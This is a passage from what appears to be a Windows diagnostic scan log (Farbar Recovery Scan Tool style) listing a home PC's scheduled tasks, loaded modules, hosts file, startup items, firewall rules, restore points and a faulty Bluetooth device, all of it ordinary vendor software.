Task: {D36A7D16-FBC0-4A7A-9299-D58BBD854070} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {DAC5341D-288C-497E-87A6-E5B0A7BB636D} - System32\Tasks\CapUninst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapUninst.exe [2009-07-24] (CL)
Task: {DEE14384-7905-4670-89F2-0DD5537DDCF2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-03-10] (HP Inc.)
Task: {E249B004-6E71-428A-B8C6-D6B544BF9CDE} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-03-14] (Adobe Systems Incorporated)
Task: {F48C3389-DD00-468F-A973-CFDC7DBC1811} - System32\Tasks\HP AR Program Upload - 0d60bc3f0082496cb0a78fb164966ae5a438eec360ce49da826ce93d3fddc137 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {F527B042-0A90-41E1-BB74-CB6A04386782} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {F7839AA3-029F-4006-8CAA-6F10A08907C6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-03-26] (Microsoft Corporation)
Task: {FB4AE634-F4B6-4C0A-8A6A-A65CD4BDFB0A} - System32\Tasks\DRScanner Startup => C:\Program Files (x86)\Trend Micro\DRScanner\DRScanner.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE
Task: C:\Windows\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE :/EXE:{3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} /F:Update  SYSTEM ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\HPCeeScheduleForKEKLR.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2010-05-18 14:12 - 2009-11-05 08:40 - 00085504 _____ () C:\Windows\System32\cpwmon64.dll
2016-08-23 19:23 - 2017-02-26 15:32 - 08930496 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2009-07-21 13:34 - 2009-07-21 13:34 - 00610872 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2009-08-09 04:42 - 2009-01-21 14:47 - 00247152 ____N () C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
2009-07-01 18:44 - 2009-07-01 18:44 - 00632888 _____ () C:\Program Files (x86)\Hewlett-Packard\Shared\hpqToaster.exe
2010-06-30 01:12 - 2010-06-30 01:12 - 00061440 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00131072 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\ECenter\ECLibrary.dll
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumdx32.dll
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumd32.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00040960 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00005632 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00018944 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00036864 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00007680 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Microsoft.Practices.EnterpriseLibrary.ExceptionHandling.Logging.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCP71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCR71.dll
2009-07-23 14:37 - 2009-07-23 14:37 - 00931112 ____N () c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71.DLL
2009-07-24 21:24 - 2009-07-24 21:24 - 00124288 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLSchMgr.dll
2009-07-24 21:24 - 2009-07-24 21:24 - 00275848 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLCapEngine.dll
2009-07-24 21:24 - 2009-07-24 21:24 - 00349480 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLTinyDB.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71U.DLL
2015-06-03 13:44 - 2015-06-03 13:44 - 00315648 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\dblite.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 02121728 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtCore4.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 07745536 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtGui4.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 00135168 _____ () C:\Program Files (x86)\Common Files\LightScribe\plugins\imageformats\qjpeg4.dll
2016-08-23 19:23 - 2017-02-26 13:58 - 08929984 _____ () C:\Program Files (x86)\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-08-23 19:23 - 2017-02-26 13:58 - 08929984 _____ () C:\Program Files (x86)\Microsoft Office\Root\Office16\1033\GrooveIntlResource.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\sharepoint.com -> hxxps://geisinger-files.sharepoint.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2012-08-15 20:16 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 204.186.80.229 - 204.186.110.114
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^KEKLR^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: msnmsgr => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
MSCONFIG\startupreg: NortonOnlineBackupReminder => "C:\Program Files (x86)\Symantec\Norton Online Backup\Activation\NobuActivation.exe" UNATTENDED
MSCONFIG\startupreg: ooVoo.exe => C:\Program Files (x86)\ooVoo\oovoo.exe /minimized
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{E1D7F83E-8125-4845-90A7-673ADEF33553}] => (Allow) svchost.exe
FirewallRules: [{B3229E98-0217-4660-8DE6-F3FAB7DC660B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector\PDR.EXE
FirewallRules: [{25561CBD-ECD5-4B2A-A6B7-AAC23815F36E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartMusic.exe
FirewallRules: [{DFFCBF30-C5DF-4898-8A74-672CBD634E93}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartPhoto.exe
FirewallRules: [{1A8F384C-D5FB-424C-864F-DFBDD7097751}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartVideo.exe
FirewallRules: [{25AD11FD-9A9F-4400-AD7E-D1702D6879EC}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\TSMAgent.exe
FirewallRules: [{88F56785-A335-4A9E-A307-233FED433B1E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\Kernel\CLML\CLMLSvc.exe
FirewallRules: [{0FA28E00-84B9-499D-BABD-0FF0CB52E7DA}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPDVDSmart.exe
FirewallRules: [{EA67C5FD-9887-4967-B124-B80BDD1D9572}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartMusic.exe
FirewallRules: [{C32D536B-BDF8-48A2-B50E-15F07DFB9F1A}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartPhoto.exe
FirewallRules: [{5AAFCC03-01D9-4D96-9427-3F2C6DE5154E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartVideo.exe
FirewallRules: [{EA1F0951-8BA5-41CB-A72A-34307C6E1966}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\TSMAgent.exe
FirewallRules: [{98616B3D-0AAC-4C16-8ECE-981D41D17865}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
FirewallRules: [{D639F928-A1C7-4D0F-9135-C8527DF99989}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\QP.exe
FirewallRules: [{CD01A839-E293-40DF-A297-6D1E71CBF919}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\QPService.exe
FirewallRules: [{1159FAE0-AD6A-402E-BF7C-378981DE37CE}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{4216947E-E48E-4D68-832C-B84405FCA4FD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{B1B24A7E-5C03-4B2E-BC74-F446D90241B1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{71E5C151-FC96-44B3-A2CA-A748564E2318}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{AE1DD8AE-DAA6-4E3A-A82E-0B84DD062818}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{2E3483C0-9134-4DEC-A8D6-FE74ABD65F6D}] => (Allow) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [TCP Query User{9F515C7B-8CC7-4B76-8DF6-F904758E6FF6}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Allow) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [UDP Query User{8D839777-A6FB-47E8-B380-7AD82C5F564F}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Allow) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [TCP Query User{5A0D406D-2C29-4D0B-83D7-D26AF7FFE562}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Block) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [UDP Query User{A60AD26E-BC55-4B0C-BB47-6E4EF5036555}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Block) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [{93464EED-A641-4CB5-8DC6-92BFDF7A1E14}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
FirewallRules: [{DC01FAA2-E761-4009-AD0C-43E643AD9B75}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
FirewallRules: [TCP Query User{303F326C-E8E1-4E8E-B813-F47FFD9F0723}C:\windows\system32\wfs.exe] => (Allow) C:\windows\system32\wfs.exe
FirewallRules: [UDP Query User{DCA3884F-EB76-4A60-A6B9-1DFF3FE0BBD0}C:\windows\system32\wfs.exe] => (Allow) C:\windows\system32\wfs.exe
FirewallRules: [{807B38CE-D94F-4932-B5B4-76AFD4EACD49}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{286E2E43-1C9B-4F06-B81D-1AC670CE9FB6}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{60FE7295-6201-4657-999B-4EF247CE7B99}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [TCP Query User{1DE570DA-78EC-4184-A009-98FB9B493B34}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [UDP Query User{D887F8EE-A443-40B6-B7B5-600540129350}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{5AB7D43E-8475-4578-A94A-1F2F90B7D6C0}] => (Allow) LPort=443
FirewallRules: [{B64ACE0E-B87F-4398-B1F3-852D19BE57F9}] => (Allow) LPort=443
FirewallRules: [{F6B20571-EB14-49D0-94C9-80FCB65ADCFF}] => (Allow) LPort=37674
FirewallRules: [{62D436F2-ADC2-4C86-96A8-B1F8CB9AC10F}] => (Allow) LPort=37674
FirewallRules: [{C3651C1F-C25C-4E6F-B502-3D5354C27B43}] => (Allow) LPort=37675
FirewallRules: [{0544294C-EA9B-402F-8605-23FF31F7AD74}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{9CED51D6-960B-413C-A290-F9C46BAA9D15}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{65EADB25-C00A-4DDC-A22F-5E81ACCB0EA9}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{A094DAF1-5D2E-4D12-8F1E-8FADDCD6C8FF}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{DCE8C09D-7BD0-4FFC-B0DE-1BAAA0BF727B}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{F2411DBE-A931-4B28-BDBC-0F63AE569E04}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [TCP Query User{A4BC3617-A8AF-41F7-AEE3-B1AE7B986930}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [UDP Query User{6536AA84-BEB9-43E7-BD20-81F36A8A183E}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [TCP Query User{77151B81-74DA-46B2-B739-F1A0BFDE09EF}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [UDP Query User{41503EB1-8543-4238-BC72-9C7F53E08CFC}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [{572FCD51-C732-4315-89C8-E6BADF60CB1F}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{099E1608-3E83-453C-A568-BB3965D87EA4}] => (Allow) LPort=2869
FirewallRules: [{54E040B6-7378-4097-BFDA-57CEB23FB0C2}] => (Allow) LPort=1900
FirewallRules: [{31C42B69-8BB5-4738-AE2A-5F21F0EAC60E}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [TCP Query User{D7ECE11A-14F4-47CD-8B60-C5D3AD970D7D}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [UDP Query User{B68C8F2B-1ACD-468A-A168-2FEADD06031B}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [{7025A58C-00CD-4143-96DB-FA06A2ED5CC4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1A452F1C-3A13-47C6-9924-6B9FE2FA2EE0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{ADE58B14-70C6-4153-91AC-3B0E36524493}] => (Allow) C:\Windows\SysWOW64\dlcccoms.exe
FirewallRules: [{7301EA4A-8CC4-4DE8-AECF-6DAECD8DF3A8}] => (Allow) C:\Windows\SysWOW64\dlcccoms.exe
FirewallRules: [{9FCC936F-1ECC-4FF9-831B-D494B20D60CB}] => (Allow) C:\Windows\System32\dlcccoms.exe
FirewallRules: [{EE85E7CE-EDE5-48AC-95A9-56633C10661C}] => (Allow) C:\Windows\System32\dlcccoms.exe
FirewallRules: [{50F741E4-BECA-4A15-9FB8-0C32E919209B}] => (Allow) C:\Windows\System32\spool\drivers\x64\3\dlccpswx.exe
FirewallRules: [{F8DB05C7-6658-4DBF-8235-A5838701AA01}] => (Allow) C:\Windows\System32\spool\drivers\x64\3\dlccpswx.exe
FirewallRules: [{FBBE89C6-499F-4202-99AB-543184772EBF}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccmon.exe
FirewallRules: [{FCDFFDF1-B40D-44DE-8327-3E803EEC7AA7}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccmon.exe
FirewallRules: [{ADB57472-D531-4A14-B8EC-5CF09B84E0D7}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccaiox.exe
FirewallRules: [{29BA85FB-5A48-4FAC-A9E5-EF97C797EBE1}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccaiox.exe
FirewallRules: [{69C5F1E2-2BBF-4AC5-99AE-6EE52620C3BF}] => (Allow) C:\Users\KEKLR\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [{4F8121D3-305E-4B52-A980-511CF6637DA6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0969CE3F-AB75-4EDF-91BF-B24144E5BA03}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{64FD7F62-CA4F-4BC4-96FF-78AF71530077}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [TCP Query User{70E1C592-B5C7-4724-8604-76CC8BAD46A9}C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe
FirewallRules: [UDP Query User{CB9AB233-D91A-411D-BF56-A1B265C80959}C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe
FirewallRules: [{167D5738-02EB-40A8-B8C3-0E4C0E60F425}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{6C278C1F-E02F-4F95-B22A-12C9D9CAFBE2}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{E4E886C7-1D80-42F9-B576-B3BC4F70B32E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{C30BB94F-9D99-4F73-A420-F14961B522E1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{9E3958BA-AD48-45B7-B7F9-9CEFF14FE771}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
FirewallRules: [UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
FirewallRules: [{B81E0F49-BA90-4FF1-9A42-A74A41023898}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS1ADC\HPDiagnosticCoreUI.exe
FirewallRules: [{0647A174-0085-4BC0-9CA8-41C072C6371D}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS1ADC\HPDiagnosticCoreUI.exe
FirewallRules: [{D8133625-8DFD-427B-9111-3D14776DFE7A}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS744B\HPDiagnosticCoreUI.exe
FirewallRules: [{8E3EA3F7-663E-4722-852F-74C24267D0B0}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS744B\HPDiagnosticCoreUI.exe
FirewallRules: [{84AECAC3-5692-4F37-B037-77FBE65C0467}] => (Allow) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
FirewallRules: [{3F971EA5-E550-44CC-BBD1-93F058891F2C}] => (Allow) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
FirewallRules: [TCP Query User{362CB37B-AAA1-45EF-A332-40E197A57F28}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [UDP Query User{717A6F34-710F-48AF-996D-EE1FFC536B8B}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [{62A8F062-EB0C-4869-8EC9-5517C0C12356}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{9258237D-3CBE-457D-8BC3-B2B68083BB2D}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{54F78F36-2594-42A1-B051-D6E5ADE67F9C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{2F9785B8-F539-48A6-BA58-64C1FBF652D3}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{13573266-BCD3-483A-A735-153867261B87}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{C6B475F1-8916-4E39-9711-A5D018D1F5F7}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{FDED0C5D-B2C0-41D1-A5B1-410036D5E616}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{37C5CB39-992C-4F99-90F0-F2718E8518BA}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{D0DC0116-BF41-4FA5-98EE-EF32ECA5DF10}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [TCP Query User{F1F23913-8C7D-4B13-8D5A-52CC3B81421D}C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe] => (Allow) C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe
FirewallRules: [UDP Query User{7297ADDE-FFEE-4429-8DAD-7A733755025B}C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe] => (Allow) C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe
FirewallRules: [{9D2427F4-C33D-4E14-9231-9FFB1BBC1103}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{B9D14B95-5465-4B94-9856-C19342AF6B05}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{2E258567-5593-43F5-A73C-78A7678C2B39}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{E0DF924F-D6D4-4654-A974-39E33E8AD879}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{35A11117-24D7-4D6D-B9E2-0B15FB659EE3}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{D752A735-DAF5-4D93-B15B-27B28773A8AD}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{32A83C1F-89D4-4CBE-86D7-E8951ACF4700}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{8045D3CF-65FE-46B4-B636-F5BF369728D9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{F283683E-A7E1-4A6D-8520-E295EFEF38C2}C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe] => (Allow) C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe
FirewallRules: [UDP Query User{607FE590-DF2E-479C-9421-F45292DFA0A9}C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe] => (Allow) C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe
FirewallRules: [{2AB6E6B9-4C5B-49D9-864E-2BA0C900C86E}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe
FirewallRules: [{E1E69D41-EA01-49BA-9769-D2C8FA30C630}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe
FirewallRules: [{2239062F-51E6-476E-B7F6-F5A9FE1F0608}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe

==================== Restore Points =========================

08-03-2017 07:18:12 Windows Update
11-03-2017 13:32:40 Windows Update
14-03-2017 13:50:43 Removed Adobe Acrobat Reader DC.
15-03-2017 19:38:37 Windows Update
17-03-2017 06:21:32 Windows Update
23-03-2017 17:47:02 Windows Update
30-03-2017 19:34:54 Windows Update
01-04-2017 07:21:37 Windows Update
05-04-2017 04:42:14 Windows Update
08-04-2017 08:47:30 Windows Update

==================== Faulty Device Manager Devices =============

Name: HP Integrated Module with Bluetooth 2.0 Wireless Technology
Description: HP Integrated Module with Bluetooth 2.0 Wireless Technology
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Broadcom
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
